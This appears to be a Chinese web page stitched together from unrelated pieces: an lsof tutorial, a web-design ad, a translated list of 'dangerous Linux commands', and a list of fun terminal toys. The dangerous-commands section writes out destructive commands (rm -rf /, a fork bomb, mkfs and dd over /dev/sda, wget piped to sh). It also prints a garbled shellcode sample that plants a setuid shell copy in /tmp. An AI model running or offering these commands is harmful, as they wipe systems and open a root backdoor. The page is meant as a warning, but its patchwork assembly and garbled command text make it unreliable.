lsof是系统管理/安全的管理工具。将这个工具称之为lsof真实名副其实,因为它是指“ 列出打开文件(lists openfiles) ”。而有一点要切记,在Unix中一切(包括网络套接口)都是文件。
为乌兰察布等地区用户提供了全套网页设计制作服务,及乌兰察布网站建设行业解决方案。主营业务为网站设计制作、网站制作、乌兰察布网站设计,以传统方式定制建设网站,并提供域名空间备案等一条龙服务,秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求,就会得到认可,从而选择与我们长期合作。这样,我们也可以走得更远!
有趣的是,lsof也是有着最多开关的Linux/Unix命令之一。它有那么多的开关,它有许多选项支持使用-和+前缀。
正如你所见,lsof有着实在是令人惊讶的选项数量。你可以使用它来获得你系统上设备的信息,你能通过它了解到指定的用户在指定的地点正在碰什么东西,或者甚至是一个进程正在使用什么文件或网络连接。
对于我,lsof替代了netstat和ps的全部工作。它可以带来那些工具所能带来的一切,而且要比那些工具多得多。那么,让我们来看看它的一些基本能力吧:
理解一些关于lsof如何工作的关键性东西是很重要的。最重要的是,当你给它传递选项时,默认行为是对结果进行“或”运算。因此,如果你正是用-i来拉出一个端口列表,同时又用-p来拉出一个进程列表,那么默认情况下你会获得两者的结果。
下面的一些其它东西需要牢记:
正如我所说的,我主要将lsof用于获取关于系统怎么和网络交互的信息。这里提供了关于此信息的一些主题:
有些人喜欢用netstat来获取网络连接,但是我更喜欢使用lsof来进行此项工作。结果以对我来说很直观的方式呈现,我仅仅只需改变我的语法,就可以通过同样的命令来获取更多信息。
语法: lsof -i[46] [protocol][@hostname|hostaddr][:service|port]
你也可以通过在-i后提供对应的协议来仅仅显示TCP或者UDP连接信息。
或者,你也可以通过端口搜索,这对于要找出什么阻止了另外一个应用绑定到指定端口实在是太棒了。
这对于你在检查是否开放连接到网络中或互联网上某个指定主机的连接时十分有用。
你也可以组合主机与端口的显示信息。
找出正等候连接的端口。
你也可以grep “LISTEN”来完成该任务。
你也可以显示任何已经连接的连接。
你也可以通过grep搜索“ESTABLISHED”来完成该任务。
你也可以获取各种用户的信息,以及它们在系统上正干着的事情,包括它们的网络活动、对文件的操作等。
可以消灭指定用户运行的所有东西,这真不错。
可以查看指定程序或进程由什么启动,这通常会很有用,而你可以使用lsof通过名称或进程ID过滤来完成这个任务。下面列出了一些选项:
通过查看指定文件或目录,你可以看到系统上所有正与其交互的资源——包括用户、进程等。
与tcpdump类似,当你开始组合查询时,它就显示了它强大的功能。
这通常(当不总是)表示某个攻击者正尝试通过删除文件入口来隐藏文件内容。
本入门教程只是管窥了lsof功能的一斑,要查看完整参考,运行man lsof命令或查看在线版本。
我总结一下lsof指令的用法:
lsof abc.txt 显示开启文件abc.txt的进程
lsof -i :22 知道22端口现在运行什么程序
lsof -c abc 显示abc进程现在打开的文件
lsof -g gid 显示归属gid的进程情况
lsof +d /usr/local/ 显示目录下被进程开启的文件
lsof +D /usr/local/ 同上,但是会搜索目录下的目录,时间较长
lsof -d 4 显示使用fd为4的进程
lsof -i 用以显示符合条件的进程情况
lsof -p 12 看进程号为12的进程打开了哪些文件
lsof +|-r [t] 控制lsof不断重复执行,缺省是15s刷新
-r,lsof会永远不断的执行,直到收到中断信号
+r,lsof会一直执行,直到没有档案被显示
Linux命令行佷有用、很高效,也很有趣,但有时候也很危险,尤其是在你不确定你自己在正在做什么时候。这篇文章并不打算引来你对Linux或linux命令行的愤怒。我们只是想让你意识到在你运行某些命令时应该三思而后行。(译注:当然,以下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普通用户身份下,破坏的只是自己的一亩三分地。)
1. rm -rf命令
rm -rf命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些rm命令的选项。
rm 命令在Linux下通常用来删除文件。
rm -r命令递归的删除文件夹,甚至是空的文件夹。(译注:个人认为此处应该是说错了,从常识看,应该是“甚至是非空的文件夹”)
rm -f命令能不经过询问直接删除‘只读文件’。(译注:Linux下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限。所以,-f这个参数只是表示不必一个个删除确认,而是一律悄悄删除。另外,原始的rm命令其实也是没有删除提示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来要求删除确认,而-f则抑制了这个提示。)
rm -rf / :强制删除根目录下所有东东。(就是说删除完毕后,什么也没有了。。。)
rm -rf *: 强制删除当前目录的所有文件。
rm -rf . :强制删除当前文件夹及其子文件夹。
从现在起,当你要执行rm -rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名,来预防用‘rm‘命令删除文件时的事故,它会要求你确认每一个删除请求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好你在做什么!译者本人有着血泪的教训啊。)
2. :(){:|:};:命令
这就是个fork炸弹的实例。具体操作是通过定义一个名为‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。
:(){:|:};:哦?你确认你要试试么?千万别在公司正式的服务器上实验啊~~
3.命令 /dev/sda
上列命令会将某个‘命令‘的输出写到块设备/dev/sda中。该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。
4. mv文件夹/dev/null
这个命令会移动某个‘文件夹‘到/dev/null。在Linux中/dev/null或null设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。(译注:这就是黑洞啊。当然,要说明的是,通过将文件夹移动到黑洞,并不能阻止数据恢复软件的救赎,所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。)
# mv /home/user/* /dev/null上列命令会将User目录所有内容移动到/dev/null,这意味着所有东西都被‘卷入’黑洞 (null)之中。
5. wget -O- | sh
上列命令会从一个(也许是)恶意源下载一个脚本并执行。Wget命令会下载这个脚本,而sh会(无条件的)执行下载下来的脚本。
注意:你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。(译注:所以,你真的知道你在做什么吗?当遇到这种需要是,我的做法是,先wget下来,然后我去读一读其中到底写了些什么,然后考虑是否执行。)
6. mkfs.ext3 /dev/sda
上列命令会格式化块设备‘sda’,你无疑知道在执行上列命令后你的块设备(硬盘驱动器)会被格式化,崭新的!没有任何数据,直接让你的系统达到不可恢复的阶段。(译注:通常不会直接使用/dev/sda这样的设备,除非是作为raw设备使用,一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然,无论你使用sda还是sda1,这样对块设备或分区进行mkfs都是毁灭性的,上面的数据都会被蒸发了。)
7. file
上列命令常用来清空文件内容(译注:通常也用于记录命令输出。不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外,我想你可能真正想用的是“”,即累加新的输出到文件,而不是刷新那个文件。)。如果用上列执行时输入错误或无知的输入类似“ xt.conf” 的命令会覆盖配置文件或其他任何的系统配置文件。
8. ^foo^bar
这个命令在我们十个鲜为人知的Linux命令- Part 3中描述过,用来编辑先前运行的命令而无需重打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。(译注:事实上,这种小技巧是译者认为的,少数史前时代遗留下来的无用而有害的“黑客”技巧。)
9. dd if=/dev/random of=/dev/sda
上列命令会向块设备sda写入随机的垃圾文件从而擦出数据。当然!你的系统可能陷入混乱和不可恢复的状态。(译注:记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见,你可以覆写多次。)
10.隐藏命令
下面的命令其实就是上面第一个命令(rm -rf)。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的根分区。
这个命令表明通常真正的危险是隐藏的,不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。不要编译/运行从未知来源的代码。
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
=“euml;[1Agrave;PTZƒìdh″
“yuml;yuml;yuml;yuml;hszlig;ETH;szlig;Ugrave;h™″
“szlig;h’szlig;Ograve;T^÷÷″
“V÷V÷VƒAuml;tV″
“sVSTY°Iacute;€1″
“Agrave;@euml;ùèfrac12;yuml;yuml;yuml;/bi″
“n/sh-c″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;注意:不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令。如果你想测试它们,请在虚拟机上运行。任何不和谐或数据丢失,由于运行上面的命令导致你的系统崩溃,文章作者和Tecmint概不负责。(译注:译者和转载网站也不负责~!)
桌面环境是充满魅力,吸引眼球的。不仅增强了视觉体验,而且在某些情况下能增强软件的功能,增添趣味。其实在命令行下工作也并不总是那么单调乏味。如果你想在命令行下获取几分乐趣的话,自然也是有很多命令可以令你泛起微笑。
Linux 是一个充满乐趣的操作系统。 功能各异,显而易见到奇秒神奇的巨大开源小工具集被 Linux 所提供。正是由于这些高质量可选择工具令 Linux 脱颖而出。来看看下面这7个小工具。
Lolcat
Lolcat 是一个能连接文件或者标准输入,并将其内容输出到标准输出的程序(像是一般的 cat),但是它能给文字赋予美丽的彩虹。 Lolcat 常常与诸如 toilet 和 figlet 的之类的其他工具组合起来生成文字。
开发者:Lolcat 由 Moe 开发。
站点:github.com。
Cowsay
Cowsay 是一个可配置的开源程序,它能够产生一幅由 ASCII 字符组成的一头奶牛和一个会话气泡图像。由 Perl 语言编写的 cowsay 不仅仅局限于产生奶牛的图像,它也能产生预先生成的其他动物图像,如鸭子,大象,考拉,驼鹿,小马,绵羊,剑龙和火鸡等。还有非动物的棋子,雪人和一个骨架。
有一个和这个相关的程序叫做 cowthink ,它生成的是一头奶牛和它思考的气泡,而不是像 cowsay 生成的是会话气泡。
特点:
令脚本程序更加有趣。
博格模式。
可改变奶牛的面貌,比如让它看起来贪婪,偏执,冷酷,疲惫,年轻等等。
站点:nog.net。
Doge
Doge 是一个基于略显愚蠢实则非常有趣的柴犬图的简单 motd 脚本。它随机的打印一些语法不正确的语句,有时这些相关语句来源于你的计算机。
Doge 是一个在2013年流行起来的网络模因。该模因通常由柴犬的图片配上 Comic Sans 字体的五彩文字。这些文字是一种内心的独白,并且还故意使用蹩脚英语。
特点:
文字出现的位置与颜色随机,故意使用了蹩脚英语。
能抓取系统数据,如主机名,运行中的进程,最近的用户和编辑器等。
如果你有 lolcat ,你可以试试这样: while true; do doge | lolcat -a -d 100 -s 100 -p 1; done
支持标准输入: ls /usr/bin | doge 将会以 doge 样式打印出在 /usr/bin 目录下找到的一些可执行程序。哇哦!这还能用来统计你频繁使用哪些命令。
站点:github.com/thiderman/doge。
ASCIIQuarium
ASCIIQuarium 是一个用 ASCII 字符艺术表达的水族馆或大海的动漫。尽情的欣赏你计算机中那些在水中游动的美丽生物吧!
你需要安装 Perl 的 curses 包和 Term::Animation 模块来支持 ASCIIQuarium 的运行。终端执行: sudo apt-get install libcurses-perl 和 sudo cpan Term::Animation 即可安装上述两个依赖。
特点:
色彩斑斓的鱼。
有趣的动漫,还有一个鱼钩。
有天鹅,鸭子,海豚和船。
站点:。
Sl – Strem Locomotive
Sl 是一个有趣的命令行工具,他通过一个火车开过的动画来纠正用户偶然把 ls 输错成 sl。
我相当疏忽命令输入的过程的正确性,我更愿意追求速度。但这可能会造成危险。因此 sl 可以很好的在我发生这些错误时提醒我。
特点:
-F 开关,控制火车文件。
-l 开关,显示一个小火车。
-a 开关,似乎会发生一场事故。
站点:github.com/mtoyoda/sl。
Aafire
Aafire 在终端展现的是一个燃烧中的 ASCII 字符构成的火焰。它展现的是一个 ascii 显示库 aalib的功能。
站点:aa-project.sourceforge.net/aalib。
CMatrix
CMatrix 是一个 ncurses 库程序,模拟“黑客帝国”中的一个画面。如果你看过“黑客帝国”这部电影,那么你就会知道。
它工作在132×300 大小的终端中,可以进行同步或异步速率的翻滚,还可用户自定义速率。
特点:
改变文本的颜色。
使用粗体字符。
异步翻滚。
老式风格翻滚。
“屏幕保护”模式。
站点:。
这里有几个你可以先看下,你也要学习些基本的命令网页链接。